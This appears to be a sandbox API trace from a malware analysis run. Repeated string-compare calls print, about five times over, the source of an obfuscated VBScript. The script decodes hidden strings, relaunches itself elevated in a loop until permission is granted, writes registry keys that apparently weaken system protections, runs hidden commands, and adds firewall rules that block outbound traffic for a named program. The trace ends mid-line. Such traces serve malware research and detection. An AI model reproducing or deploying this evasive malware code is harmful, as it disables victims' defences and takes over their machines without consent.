okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 87 [0226.299] wcsncmp (_String1="(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 27 [0226.300] wcsncmp (_String1="s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102 [0226.300] wcsncmp (_String1="1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 36 [0226.300] wcsncmp (_String1=",2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 31 [0226.300] wcsncmp (_String1="2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = 